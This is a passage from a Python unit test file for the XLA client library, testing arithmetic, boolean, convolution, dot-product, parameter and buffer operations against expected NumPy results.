self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF16(self):
c = self._NewComputation()
c.Mul(
c.Constant(np.array([2.5, 3.3, -1.2, 0.7], np.float16)),
c.Constant(np.array([-1.2, 2, -2, -3], np.float16)))
self._ExecuteAndCompareClose(
c, expected=np.array([-3, 6.6, 2.4, -2.1], np.float16), rtol=2e-3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testIota(self):
c = self._NewComputation()
c.Iota(np.float32, 10)
self._ExecuteAndCompareExact(c, expected=np.arange(10, dtype=np.float32))
def testBroadcastedIota(self):
c = self._NewComputation()
c.BroadcastedIota(np.int64, (2, 3), 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=np.int64)
self._ExecuteAndCompareExact(c, expected=expected)
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testBooleanXor(self):
c = self._NewComputation()
c.Xor(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testShiftLeft(self):
c = self._NewComputation()
c.ShiftLeft(c.Constant(NumpyArrayS32([3])), c.Constant(NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[12])
def testShiftRightArithmetic(self):
c = self._NewComputation()
c.ShiftRightArithmetic(
c.Constant(NumpyArrayS32([-2])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[-1])
def testShiftRightLogical(self):
c = self._NewComputation()
c.ShiftRightLogical(
c.Constant(NumpyArrayS32([-1])), c.Constant(NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[2**31 - 1])
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testConstantAxpyF32(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF32Scalar(2),
c.Constant(NumpyArrayF32([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF32([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testConstantAxpyF64(self):
c = self._NewComputation()
c.Add(
c.Mul(
c.ConstantF64Scalar(2),
c.Constant(NumpyArrayF64([2.2, 3.3, 4.4, 5.5]))),
c.Constant(NumpyArrayF64([100, -100, 200, -200])))
self._ExecuteAndCompareClose(c, expected=[104.4, -93.4, 208.8, -189])
def testCustomCall(self):
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
c.CustomCall(
b"test_subtract_f32",
operands=(c.ConstantF32Scalar(1.25), c.ConstantF32Scalar(0.5)),
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=(
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
))
self._ExecuteAndCompareClose(c, expected=0.75)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.f32_4vector = NumpyArrayF32([-2.3, 3.3, -4.3, 5.3])
self.f64_scalar_2 = NumpyArrayF64(2.0)
self.f64_4vector = NumpyArrayF64([-2.3, 3.3, -4.3, 5.3])
self.s32_scalar_3 = NumpyArrayS32(3)
self.s32_4vector = NumpyArrayS32([10, 15, -2, 7])
self.s64_scalar_3 = NumpyArrayS64(3)
self.s64_4vector = NumpyArrayS64([10, 15, -2, 7])
def testScalarTimesVectorAutonumberF32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f32_scalar_2)
p1 = c.ParameterFromNumpy(self.f32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorAutonumberF64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.f64_scalar_2)
p1 = c.ParameterFromNumpy(self.f64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.6, 6.6, -8.6, 10.6])
def testScalarTimesVectorS32(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s32_scalar_3)
p1 = c.ParameterFromNumpy(self.s32_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s32_scalar_3, self.s32_4vector],
expected=[30, 45, -6, 21])
def testScalarTimesVectorS64(self):
c = self._NewComputation()
p0 = c.ParameterFromNumpy(self.s64_scalar_3)
p1 = c.ParameterFromNumpy(self.s64_4vector)
c.Mul(p0, p1)
self._ExecuteAndCompareExact(
c,
arguments=[self.s64_scalar_3, self.s64_4vector],
expected=[30, 45, -6, 21])
def testScalarMinusVectorExplicitNumberingF32(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f32_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f32_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f32_scalar_2, self.f32_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
def testScalarMinusVectorExplicitNumberingF64(self):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
p1 = c.ParameterFromNumpy(self.f64_4vector, parameter_num=1)
p0 = c.ParameterFromNumpy(self.f64_scalar_2, parameter_num=0)
c.Sub(p1, p0)
self._ExecuteAndCompareClose(
c,
arguments=[self.f64_scalar_2, self.f64_4vector],
expected=[-4.3, 1.3, -6.3, 3.3])
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def _Execute(self, c, arguments):
compiled_c = c.Build().Compile()
arg_buffers = [xla_client.Buffer.from_pyval(arg) for arg in arguments]
result_buffer = compiled_c.Execute(arg_buffers)
return result_buffer.to_py()
def testConstantSum(self):
c = self._NewComputation()
c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testOneParameterSum(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=4.25)
def testTwoParameterSum(self):
c = self._NewComputation()
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0.)),
c.ParameterFromNumpy(NumpyArrayF32(0.)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)], expected=4.25)
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
c.Add(c.ParameterFromNumpy(NumpyArrayF32(0.)), c.ConstantF32Scalar(3.14))
arg = NumpyArrayF32(1.11)
compiled_c = c.Build().Compile()
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(RuntimeError):
compiled_c.Execute([arg_buffer])
def testDestructureTupleEmpty(self):
t = ()
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertEmpty(pieces)
def testDestructureTupleOneArrayElement(self):
t = (np.array([1, 2, 3, 4], dtype=np.int32),)
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 1)
array = pieces[0]
got = array.to_py()
want = NumpyArrayS32([1, 2, 3, 4])
np.testing.assert_equal(want, got)
def testDestructureTupleTwoArrayElementDifferentType(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
local_buffer = xla_client.Buffer.from_pyval(t)
# Run the test twice to verify that the original tuple buffer remains valid
# even after destructuring.
for _ in range(2):
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertLen(got, 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testMakeTuple(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
b0 = xla_client.Buffer.from_pyval(t[0])
b1 = xla_client.Buffer.from_pyval(t[1])
device = xla_client.get_local_backend().local_devices()[0]
btup = xla_client.Buffer.make_tuple([b0, b1], device=device)
pieces = btup.destructure()
self.assertLen(pieces, 2)
array0, array1 = pieces
np.testing.assert_equal(
np.array([1, 2, 3, 4], dtype=np.float32), array0.to_py())
np.testing.assert_equal(
np.array([2, 3, 4, 5], dtype=np.int32), array1.to_py())
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.Buffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = xla_client.Buffer.from_pyval(arg0)
arg1_buffer = xla_client.Buffer.from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8)
for device in xla_client.get_local_backend().local_devices():
buf = xla_client.Buffer.from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.PrimitiveType.PRED,
np.int32: xla_client.PrimitiveType.S32,
np.int64: xla_client.PrimitiveType.S64,
np.float32: xla_client.PrimitiveType.F32,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.PrimitiveType.S32,
np.float32: xla_client.PrimitiveType.F32,
}
xla_x64_types = {
np.int64: xla_client.PrimitiveType.S64,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
c.AllToAll(c.Constant(lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testReplicaId(self):
c = self._NewComputation()
_ = c.ReplicaId()
self._ExecuteAndCompareExact(c, expected=0)
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs), [[0]])
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
c.DotGeneral(
c.Constant(lhs),
c.Constant(rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [1, 1], xla_client.PaddingType.SAME)
result = np.array([[[
[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [2, 1], xla_client.PaddingType.VALID)
result = np.array([[[
[640., 700., 760.],
[1120., 1180., 1240.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
c.ConvGeneralDilated(
c.Constant(lhs),
c.Constant(rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(
c.Constant(np.transpose(lhs, (0, 2, 3, 1))), c.Constant(rhs), strides,
pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
c.Clz(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=[17, 3])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
